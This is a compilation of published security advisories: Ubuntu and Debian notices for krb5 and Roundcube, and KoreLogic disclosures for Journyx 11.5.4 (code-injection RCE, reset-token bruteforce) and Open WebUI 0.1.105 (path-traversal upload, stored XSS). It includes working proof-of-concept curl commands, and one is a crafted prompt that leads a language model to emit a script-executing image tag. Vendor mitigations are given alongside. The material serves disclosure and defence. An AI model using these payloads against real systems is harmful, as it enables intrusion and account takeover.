Ubuntu Security Notice 6947-1 - It was discovered that Kerberos incorrectly handled GSS message tokens where an unwrapped token could appear to be truncated. An attacker could possibly use this issue to cause a denial of service. It was discovered that Kerberos incorrectly handled GSS message tokens when sent a token with invalid length fields. An attacker could possibly use this issue to cause a denial of service.

==========================================================================

Ubuntu Security Notice USN-6947-1  
August 08, 2024

krb5 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Kerberos could be made to crash if it received specially crafted  
input.

Software Description:  
- krb5: MIT Kerberos Network Authentication Protocol

Details:

It was discovered that Kerberos incorrectly handled GSS message tokens  
where an unwrapped token could appear to be truncated. An attacker  
could possibly use this issue to cause a denial of service.  
(CVE-2024-37370)

It was discovered that Kerberos incorrectly handled GSS message tokens  
when sent a token with invalid length fields. An attacker could possibly  
use this issue to cause a denial of service. (CVE-2024-37371)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   krb5-admin-server               1.20.1-6ubuntu2.1  
   krb5-kdc                        1.20.1-6ubuntu2.1  
   krb5-kdc-ldap                   1.20.1-6ubuntu2.1  
   krb5-otp                        1.20.1-6ubuntu2.1  
   krb5-pkinit                     1.20.1-6ubuntu2.1  
   krb5-user                       1.20.1-6ubuntu2.1  
   libgssapi-krb5-2                1.20.1-6ubuntu2.1  
   libgssrpc4t64                   1.20.1-6ubuntu2.1  
   libk5crypto3                    1.20.1-6ubuntu2.1  
   libkadm5clnt-mit12              1.20.1-6ubuntu2.1  
   libkadm5srv-mit12               1.20.1-6ubuntu2.1  
   libkdb5-10t64                   1.20.1-6ubuntu2.1  
   libkrad0                        1.20.1-6ubuntu2.1  
   libkrb5-3                       1.20.1-6ubuntu2.1  
   libkrb5support0                 1.20.1-6ubuntu2.1

Ubuntu 22.04 LTS  
   krb5-admin-server               1.19.2-2ubuntu0.4  
   krb5-kdc                        1.19.2-2ubuntu0.4  
   krb5-kdc-ldap                   1.19.2-2ubuntu0.4  
   krb5-otp                        1.19.2-2ubuntu0.4  
   krb5-pkinit                     1.19.2-2ubuntu0.4  
   krb5-user                       1.19.2-2ubuntu0.4  
   libgssapi-krb5-2                1.19.2-2ubuntu0.4  
   libgssrpc4                      1.19.2-2ubuntu0.4  
   libk5crypto3                    1.19.2-2ubuntu0.4  
   libkadm5clnt-mit12              1.19.2-2ubuntu0.4  
   libkadm5srv-mit12               1.19.2-2ubuntu0.4  
   libkdb5-10                      1.19.2-2ubuntu0.4  
   libkrad0                        1.19.2-2ubuntu0.4  
   libkrb5-3                       1.19.2-2ubuntu0.4  
   libkrb5support0                 1.19.2-2ubuntu0.4

Ubuntu 20.04 LTS  
   krb5-admin-server               1.17-6ubuntu4.6  
   krb5-kdc                        1.17-6ubuntu4.6  
   krb5-kdc-ldap                   1.17-6ubuntu4.6  
   krb5-otp                        1.17-6ubuntu4.6  
   krb5-pkinit                     1.17-6ubuntu4.6  
   krb5-user                       1.17-6ubuntu4.6  
   libgssapi-krb5-2                1.17-6ubuntu4.6  
   libgssrpc4                      1.17-6ubuntu4.6  
   libk5crypto3                    1.17-6ubuntu4.6  
   libkadm5clnt-mit11              1.17-6ubuntu4.6  
   libkadm5srv-mit11               1.17-6ubuntu4.6  
   libkdb5-9                       1.17-6ubuntu4.6  
   libkrad0                        1.17-6ubuntu4.6  
   libkrb5-3                       1.17-6ubuntu4.6  
   libkrb5support0                 1.17-6ubuntu4.6

Ubuntu 18.04 LTS  
   krb5-admin-server               1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-kdc                        1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-kdc-ldap                   1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-otp                        1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-pkinit                     1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-user                       1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libgssapi-krb5-2                1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libgssrpc4                      1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libk5crypto3                    1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkadm5clnt-mit11              1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkadm5srv-mit11               1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkdb5-9                       1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkrad0                        1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkrb5-3                       1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkrb5support0                 1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   krb5-admin-server               1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-kdc                        1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-kdc-ldap                   1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-otp                        1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-pkinit                     1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-user                       1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libgssapi-krb5-2                1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libgssrpc4                      1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libk5crypto3                    1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkadm5clnt-mit9               1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkadm5srv-mit9                1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkdb5-8                       1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkrad0                        1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkrb5-3                       1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkrb5support0                 1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro

Ubuntu 14.04 LTS  
   krb5-admin-server               1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-kdc                        1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-kdc-ldap                   1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-otp                        1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-pkinit                     1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-user                       1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libgssapi-krb5-2                1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libgssrpc4                      1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libk5crypto3                    1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkadm5clnt-mit9               1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkadm5srv-mit8                1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkadm5srv-mit9                1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkdb5-7                       1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkrad0                        1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkrb5-3                       1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkrb5support0                 1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6947-1   
<https://ubuntu.com/security/notices/USN-6947-1>  
   CVE-2024-37370, CVE-2024-37371

Package Information:  
https://launchpad.net/ubuntu/+source/krb5/1.20.1-6ubuntu2.1   
<https://launchpad.net/ubuntu/+source/krb5/1.20.1-6ubuntu2.1>  
https://launchpad.net/ubuntu/+source/krb5/1.19.2-2ubuntu0.4   
<https://launchpad.net/ubuntu/+source/krb5/1.19.2-2ubuntu0.4>  
https://launchpad.net/ubuntu/+source/krb5/1.17-6ubuntu4.6   
<https://launchpad.net/ubuntu/+source/krb5/1.17-6ubuntu4.6>

Ubuntu Security Notice USN-6947-1

Journyx version 11.5.4 has an issue where attackers with a valid username and password can exploit a python code injection vulnerability during the natural login flow.

KL-001-2024-008: Journyx Authenticated Remote Code Execution

Title: Journyx Authenticated Remote Code Execution  
Advisory ID: KL-001-2024-008  
Publication Date: 2024.08.07  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-008.txt

1. Vulnerability Details

      Affected Vendor: Journyx  
      Affected Product: Journyx (jtime)  
      Affected Version: 11.5.4  
      Platform: GNU/Linux  
      CWE Classification: CWE-94: Improper Control of Generation of Code  
                          ('Code Injection'), CWE-95: Improper Neutralization  
                          of Directives in Dynamically Evaluated Code  
                          ('Eval Injection')  
      CVE ID: CVE-2024-6891

2. Vulnerability Description

      Attackers with a valid username and password can exploit  
      a python code injection vulnerability during the natural  
      login flow.

3. Technical Description

      When utilizing a username and password to authenticate to  
      Journyx via the web interface, an HTTP request is sent to  
      "wtlogin.pyc" containing the credentials. Upon a successful  
      login, the user is redirected to "wte.pyc" or the URL specified  
      in the "end_URL" body parameter if one is supplied.

      An additional condition is present, however. If the  
      "end_URL" value is over 1,000 characters, the value is instead  
      interpolated into a python "import" statement which is passed  
      into the "exec()" function, thereby executing arbitrary code.

      Code snippet from "wtlogin.pyc":

      finalURL = end_URL + '.pyc?' + genlib.URLEncodeParams(params)  
      if len(finalURL) < 1000:  
          raise genlib.HTTP302Found(finalURL)  
      else:  
          exec('import %s; %s.main()' % (end_URL, end_URL))

      The "params" variable is derived from the query parameters  
      included in the login request, so the size of "finalURL"  
      is trivial to inflate.

4. Mitigation and Remediation Recommendation

      The vendor reports that this issue was remediated in Journyx  
      v12.0.0, which is the first wholly cloud-hosted version of  
      this product.

      For self-hosted instances of JournyX, additional security  
      measures (such as input sanitization) can be added by monkey  
      patching the PYC file responsible for handling request  
      parameters (mycgi.pyc).

      1) Rename "mycgi.pyc" to an alternative name, e.g. mycgi_original.pyc.  
           $ mv wt_tar/pi/pylib/wtlib/mycgi.py wt_tar/pi/pylib/wtlib/mycgi_original.py

      2) Create a file named "mycgi.py" in the same directory.  
           $ touch wt_tar/pi/pylib/wtlib/mycgi.py

      3) Insert the following code into the newly created "mycgi.py"

           from mycgi_original import *  
           from html import escape

           def patch():  
               pdata = _parse()

               # force the value of "end_URL" to always be "wte"  
               if pdata.get('end_URL'): pdata['end_URL'] = ['wte']

               # sanitize user-controlled error messages  
               for parameter in ['error', 'error_description']:  
                   if not pdata.get(parameter): continue  
                   pdata[parameter] = [escape(value) for value in pdata[parameter]]

               return pdata

           _parse = parse  
           parse  = patch

      Once these changes have been made, the JournyX native "mycgi.parse()"  
      function will be overwritten with the "patch()" function located in the  
      "mycgi.py" file. Relevant to this advisory, the patch provided above  
      will force the "end_URL" parameter to always have a value of "wte".

5. Credit

      This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc.

6. Disclosure Timeline

      2024.01.31 - KoreLogic notifies Journyx support of the intention to  
                   report vulnerabilities discovered in the licensed,  
                   on-premises version of the product.  
      2024.01.31 - Journyx acknowledges receipt.  
      2024.02.02 - KoreLogic requests a meeting with Journyx support to share  
                   vulnerability details.  
      2024.02.07 - KoreLogic reports vulnerability details to Journyx.  
      2024.02.09 - Journyx responds that this vulnerability has been remediated  
                   in the cloud-hosted version of the product.  
      2024.02.21 - KoreLogic offers to test the cloud version to confirm  
                   the fix; no response.  
      2024.07.01 - KoreLogic notifies Journyx of impending public disclosure.  
      2024.07.09 - Journyx confirms version number of the remediation.  
      2024.08.07 - KoreLogic public disclosure.

7. Proof of Concept

     By leveraging the existing "web" python module, it is possible  
     to see the output of shell commands as returned by "os.popen()".

     [attacker@box]$ HOST='redacted.com'; PORT='8080'; USERNAME='employee'; PASSWORD='password123'; COMMAND='id'; \  
                     curl -x http://localhost:8080 -X POST \  
                          -d   
"wtusername=$USERNAME&wtpassword=$PASSWORD&end_URL=os,web%0aweb.response.text%3dos.popen('$COMMAND').read()#&timestamp=9999999999&pageid=$RANDOM"   
\  
                          -H 'Cookie: wtsession=foobar' \  
"http://$HOST:$PORT/jtcgi/wtlogin.pyc?z=$(printf 'Z%.0s' {1..1000})"

     uid=1000(foo) gid=1000(foo)   
groups=1000(foo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)  
     [attacker@box]$

The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Journyx 11.5.4 Authenticated Remote Code Execution

Debian Linux Security Advisory 5743-1 - Multiple cross-site scripting vulnerabilities were discovered in RoundCube webmail.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5743-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 08, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : roundcube  
CVE ID         : CVE-2024-42008 CVE-2024-42009 CVE-2024-42010

Multiple cross-site scripting vulnerabilities were discovered in  
RoundCube webmail.

 For the stable distribution (bookworm), these problems have been fixed in  
version 1.6.5+dfsg-1+deb12u3.

We recommend that you upgrade your roundcube packages.

For the detailed security status of roundcube please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/roundcube

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAma0oZkACgkQEMKTtsN8  
TjYxhA//UCLgEJvU4lRhVKupyDDsLgIxy4yWCvwDORqLtckWd83mJZXqbnUQYOUU  
bvTaAHZ5XEEQ8mNwviDwgQZoSK7hY0ZHPb3NSbuc/2hl6aVUp9BqxzQ0iZ4haxiY  
LtbqB29zpelXB0orRgH+rNISBLwAei2C+Vf213TKTmceiUGzhRxvkJKr4H++W2b6  
7OkAoYqXIIH8OvKJmMgLirW/+toGR29c9F29d+C3Oyq/Qis0e/6osDIehFAdayro  
EGJAvoUm72Vfe+syTF3csItT4vtf73qMb51CP67ATeGZ29j7bllqHgybLfjfZyI7  
a4v5/VUGe+tDxvFiSsPCpBDuin843qt3rflrcy/LFaVvrYa7/SIcwV84uxVrjf85  
mwwlIIud8n01EY7oPw0LK51a6MIrniFePAC3/KyYgBhya+hKE1T3JLQ/8XDRk/zo  
M9Mqu1MbtamhjAeTdzkckRr+9ho+meY5un1MmnPtVIMoAaNhG/AteeqAuwCtucAF  
Fg36kslrDwd+ojYUavIaE3AoRoLRzto5aAy46tXCE5JSakw2haKpBHoQfAhFwLZ/  
59xds+gu7lRWp71Qhx2xBYclJ9XGNsdyx1g8Dzt0tPTQxwHCShP3fI2Wit8QOsWu  
VeqdGxyqGT+cFrTmWRaVCKRQOsUgLjTpY2Nm5aKorBdD1HT8FU0=  
=eXCy  
-----END PGP SIGNATURE-----

Debian Security Advisory 5743-1

Journyx version 11.5.4 suffers from an issue where password reset tokens are generated using an insecure source of randomness. Attackers who know the username of the Journyx installation user can bruteforce the password reset and change the administrator password.

KL-001-2024-007: Journyx Unauthenticated Password Reset Bruteforce

Title: Journyx Unauthenticated Password Reset Bruteforce  
Advisory ID: KL-001-2024-007  
Publication Date: 2024.08.07  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-007.txt

1. Vulnerability Details

      Affected Vendor: Journyx  
      Affected Product: Journyx (jtime)  
      Affected Version: 11.5.4  
      Platform: GNU/Linux  
      CWE Classification: CWE-321: Use of Hard-coded Cryptographic Key,  
                          CWE-334: Small Space of Random Values,  
                          CWE-799: Improper Control of Interaction Frequency  
      CVE ID: CVE-2024-6890

2. Vulnerability Description

      Password reset tokens are generated using an insecure source  
      of randomness. Attackers who know the username of the Journyx  
      installation user can bruteforce the password reset and change  
      the administrator password.

3. Technical Description

     From an unauthenticated perspective, a user can initiate the  
     password reset flow by clicking the "Reset your password" button  
     on the Journyx login screen and supplying a valid username. A  
     password reset link containing a "random" token is sent to the  
     email address associated with the username.

     The password reset token is generated using the current epoch  
     and the user ID associated with the request. The user ID is  
     a 128-bit UUID for every user *except* for the user created  
     during the initial setup of the Journyx instance, i.e., the  
     system administrator account. For this single user, the user  
     ID defaults to the username. By targeting this user, the need  
     to leak a UUID is removed entirely. If the Journyx instance was  
     configured according to the official System Administration guide  
(https://journyx.com/Files/Journyx_Sysadmin_and_Recovery_v11.pdf),  
     the username is "journyx". Alternatively, the username can be  
     leaked via stacktraces.

     When generating the token, a secret key is created by inserting  
     the user ID inbetween the strings 'chuck' and 'palahniuk':

         mysessiontoken = 'chuck%spalahniuk' % me

     This key is used to XOR the string literal representation of  
     the list object "[userID, time.time()]". The output of the XOR  
     function is then base64 encoded:

         eStr = xor_str(istr, key)  
         aStr = binascii.b2a_base64(eStr).strip()

     Since the user ID is a known value, only the output of  
     "time.time()" (the epoch at the time of "encryption") is  
     unknown. However, by opening a TCP connection and noting the  
     epoch immediately after sending an HTTP request to initiate  
     the password reset flow, a pool of tokens can be generated by  
     incrementing the epoch. There is a high degree of certainty  
     the valid reset token is contained within a pool larger than  
     50,000 tokens.

     Depending upon network latency and other external factors,  
     a successful bruteforce attack using these tokens can take  
     anywhere from several minutes to over an hour.

4. Mitigation and Remediation Recommendation

      The vendor reports that this issue was remediated in Journyx  
      v12.0.0, which is the first wholly cloud-hosted version of  
      this product.

      For self-hosted versions of Journyx, one incremental  
      improvement is to disable user-initiated password reset  
      functionality in the application settings.

      1) Log into the JournyX web application as an administrator  
      2) Navigate to Configuration -> System Settings -> Security Settings  
      3) Ensure the checkbox labeled "Show a password reset button on login  
         screen" is disabled.  
      4) Click the "Save" button

      Another option would be to monkey patch the .pyc file that  
      contains these hardcoded strings, ./wtdoc.pyc, by deploying a .py  
      file that uses unique strings and then loads wtdoc_original.pyc  
      (see KL-001-2024-008 and KL-001-2024-009 for examples).

5. Credit

      This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc.

6. Disclosure Timeline

      2024.01.31 - KoreLogic notifies Journyx support of the intention to  
                   report vulnerabilities discovered in the licensed,  
                   on-premises version of the product.  
      2024.01.31 - Journyx acknowledges receipt.  
      2024.02.02 - KoreLogic requests a meeting with Journyx support to share  
                   vulnerability details.  
      2024.02.07 - KoreLogic reports vulnerability details to Journyx.  
      2024.02.09 - Journyx responds that this vulnerability has been remediated  
                   in the cloud-hosted version of the product.  
      2024.02.21 - KoreLogic offers to test the cloud version to confirm  
                   the fix; no response.  
      2024.07.01 - KoreLogic notifies Journyx of impending public disclosure.  
      2024.07.09 - Journyx confirms version number of the remediation.  
      2024.08.07 - KoreLogic public disclosure.

7. Proof of Concept

     The following script automatically exploits this issue by initiating  
     a password reset flow and bruteforces the value after generating a  
     list of 50,000 tokens.

     [attacker@box]$ python unauth2rce.py --url http://redacted.com:8080/ --username foo --command id  
     [*] Beginning Attack. Using the following timestamp: "1706708084.2051988"  
     [+] New Password Generated: 2DCD5AE1F0F34B84A1E0F1FB5768219B

The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Journyx 11.5.4 Unauthenticated Password Reset Bruteforce

Open WebUI version 0.1.105 suffers from arbitrary file upload and path traversal vulnerabilities.

KL-001-2024-006: Open WebUI Arbitrary File Upload + Path Traversal

Title: Open WebUI Arbitrary File Upload + Path Traversal  
Advisory ID: KL-001-2024-006  
Publication Date: 2024.08.D06  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-006.txt

1. Vulnerability Details

      Affected Vendor: Open WebUI  
      Affected Product: Open WebUI  
      Affected Version: 0.1.105  
      Platform: Debian 12  
      CWE Classification: CWE-22: Improper Limitation of a Pathname to a  
                          Restricted Directory ('Path Traversal'),  
                          CWE-434: Unrestricted Upload of File with Dangerous  
                          Type  
      CVE ID: CVE-2024-6707

2. Vulnerability Description

      Attacker controlled files can be uploaded to arbitrary  
      locations on the web server's filesystem by abusing a  
      path traversal vulnerability.

3. Technical Description

    When attaching files to a prompt by clicking the  
    plus sign (+) on the left of the message input box  
    when using the Open WebUI HTTP interface, the file  
    is uploaded to a static upload directory.

    The name of the file is derived from the original  
    HTTP upload request and is not validated or sanitized.  
    This allows for users to upload files with names  
    containing dot-segments in the file path and traverse  
    out of the intended uploads directory. Effectively, users  
    can upload files anywhere on the filesystem the  
    user running the web server has permission.

    This can be visualized by examining the python code  
    for the "/rag/api/v1/doc" API route:

       @app.post("/doc")  
       def store_doc(  
           collection_name: Optional[str] = Form(None),  
           file: UploadFile = File(...),  
           user=Depends(get_current_user),  
       ):  
           # "https://www.gutenberg.org/files/1727/1727-h/1727-h.htm"

           print(file.content_type)  
           try:  
               filename = file.filename  
               file_path = f"{UPLOAD_DIR}/{filename}"  
               contents = file.file.read()  
               with open(file_path, "wb") as f:  
                   f.write(contents)  
                   f.close()

    The "file" variable is a representation of the multipart  
    form data contained within the HTTP POST request. The  
    "filename" variable is derived from the uploaded file name  
    and is not validated before writing the file contents  
    to disk.

     This can be used to upload malicious models. These models  
     are often distributed as pickled python objects and can  
     be leveraged to execute arbitrary python bytecode once  
     deserialized. Alternatively, an attacker can leverage existing  
     services, such as SSH, to upload an attacker controlled  
     "authorized_keys" file to remotely connect to the machine.

4. Mitigation and Remediation Recommendation

      This issue was remediated in Open WebUI release v0.1.117 on 2024.04.03.

5. Credit

      This vulnerability was discovered by Jaggar Henry and Sean  
      Segreti of KoreLogic, Inc.

6. Disclosure Timeline

      2024.03.05 - KoreLogic requests secure communications channel and point  
                   of contact from OpenWebUI.com via email.  
      2024.03.12 - KoreLogic submits vulnerability details and suggested patch  
                   to maintainer via Github Security 'Report a vulnerability'  
                   web form.  
      2024.04.01 - KoreLogic opens Discussion #1385 via GitHub to request an  
                   update from the maintainer.  
      2024.04.01 - Maintainer opens a private fork and merges KoreLogic's patch.  
      2024.04.03 - Maintainer releases v0.1.117.  
      2024.08.06 - KoreLogic public disclosure.

7. Proof of Concept

    Execute the following cURL command:

       TARGET_URI='https://redacted.com'; JWT='redacted'; LOCAL_FILE='/tmp/file_to_upload.txt'\  
       curl -H "Authorization: Bearer $JWT" -F "file=$LOCAL_FILE;filename=../../../../../../../../../../tmp/pwned.txt"   
"$TARGET_URI/rag/api/v1/doc"

    Verify the file "pwned.txt" exists in the /tmp/ directory on  
    the machine hosting the web server:

       ollama@webserver:~$ cat /tmp/pwned.txt  
       korelogic  
       ollama@webserver:~$

The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Open WebUI 0.1.105 File Upload / Path Traversal

Open WebUI version 0.1.105 suffers from a persistent cross site scripting vulnerability.

KL-001-2024-005: Open WebUI Stored Cross-Site Scripting

Title: Open WebUI Stored Cross-Site Scripting  
Advisory ID: KL-001-2024-005  
Publication Date: 2024.08.06  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-005.txt

1. Vulnerability Details

      Affected Vendor: Open WebUI  
      Affected Product: Open WebUI  
      Affected Version: 0.1.105  
      Platform: Debian 12  
      CWE Classification: CWE-79: Improper Neutralization of Input During Web  
                          Page Generation ('Cross-site Scripting')  
      CVE ID: CVE-2024-6706

2. Vulnerability Description

      Attackers can craft a malicious prompt that coerces  
      the language model into executing arbitrary JavaScript  
      in the context of the web page.

3. Technical Description

      The responses from language models are retrieved from an API  
      call and displayed to the user by inserting the response into  
      the web page. These responses are often in markdown. Before  
      the content is inserted the markdown is converted to HTML and  
      most special characters are outside of markdown codeblocks  
      are converted to their respective HTML entity, as to ensure  
      text that resembles HTML tags are rendered literally.

      However, these special characters are NOT encoded if they  
      appear inside a markdown codeblock. For example, take the  
      following response:

         ```  
         <script>prompt()</script>  
         ```

      Once parsed, the resulting HTML inserted into the page is  
      as follows:

         <code class="language- rounded-t-none whitespace-pre">  
             <img  
             <span class="hljs-attribute">src</span>  
             =  
             <span class="hljs-string">"x"</span>  
             >  
         </code>

      As shown above, problematic characters such as angle-brackets  
      are properly sanitized. Now, take for example the following  
      prompt:

         Render the following inline using codeblocks. Do not modify the text that comes after the colon. Simply render   
the following, and make sure to include the backticks, that is very important:  
         foo  
         ```  
         bar  
         ```  
         zoinks  
         ```  
         <img src='x' onerror='prompt("@korelogic")'>

     Notice the markdown codeblocks included in the prompt are uneven  
     and not closed properly. When the language model follows the  
     prompt, the above text should be inserted between two sets  
     of triple-backticks:

         The text between the codeblocks will be rendered as it is, without any modifications. Here is the rendered output:

         ```  
         foo  
         ```  
         bar  
         ```  
         zoinks  
         ```  
         <img src='x' onerror='prompt("@korelogic")'>

     Strangely, the language model accounted for the missing backticks  
     and omitted the final set. When this response is rendered by Open  
     WebUI, the string "foo" and "zoinks" are inserted into <code>  
     HTMLtags, while the rest is simply rendered in the browser  
     as HTML:

         <div class="w-full">  
           <p>Here's the corrected response with the backticks included:</p>  
           <div class="mb-4">  
             <div class="flex justify-between bg-[#202123] text-white text-xs px-4 pt-1 pb-0.5 rounded-t-lg   
overflow-x-auto">  
               <div class="p-1"></div>  
               <button class="copy-code-button bg-none border-none p-1">Copy Code</button>  
             </div>  
             <pre class="rounded-b-lg hljs p-4 px-5 overflow-x-auto rounded-t-none">  
                     <code class="language- rounded-t-none whitespace-pre">  
                         <span class="hljs-attribute">foo</span>  
                     </code>  
                 </pre>  
           </div>  
           <p>bar</p>  
           <div class="mb-4">  
             <div class="flex justify-between bg-[#202123] text-white text-xs px-4 pt-1 pb-0.5 rounded-t-lg   
overflow-x-auto">  
               <div class="p-1"></div>  
               <button class="copy-code-button bg-none border-none p-1">Copy Code</button>  
             </div>  
             <pre class="rounded-b-lg hljs p-4 px-5 overflow-x-auto rounded-t-none">  
                     <code class="language- rounded-t-none whitespace-pre">  
                         <span class="hljs-attribute">zoinks</span>  
                     </code>  
                 </pre>  
           </div>  
           <img src="x" onerror="prompt('@zzgoon')"> ```

     This client-side vulnerability could be the result of expected  
     behavior from HTML codeblocks. Since <code> tags are designed  
     to contain raw HTML that is rendered as literal strings,  
     sanitization is skipped. However, by feeding the model invalid  
     markdown it is possible to confuse the sanitizer and execute  
     arbitrary JavaScript, as demonstrated above.

4. Mitigation and Remediation Recommendation

      No response from vendor; maintainer closed GitHub security  
      report GHSA-6953-m722-rpq8 on 2024.05.02. As of publication,  
      this issue appears to be remediated.

5. Credit

      This vulnerability was discovered by Jaggar Henry and Sean  
      Segreti of KoreLogic, Inc.

6. Disclosure Timeline

      2024.03.05 - KoreLogic requests secure communications channel and point  
                   of contact from OpenWebUI.com via email.  
      2024.03.12 - KoreLogic submits vulnerability details to maintainer via  
                   Github Security 'Report a vulnerability' web form.  
      2024.04.01 - KoreLogic opens Discussion #1385 via GitHub to request an  
                   update from the maintainer.  
      2024.04.16 - 30 business days have elapsed since KoreLogic  
                   attempted to contact the vendor.  
      2024.05.02 - Maintainer closes GitHub security report  
                   GHSA-6953-m722-rpq8.  
      2024.05.29 - 60 business days have elapsed since KoreLogic  
                   attempted to contact the vendor.  
      2024.07.12 - 90 business days have elapsed since KoreLogic  
                   attempted to contact the vendor.  
      2024.08.06 - KoreLogic public disclosure.

7. Proof of Concept

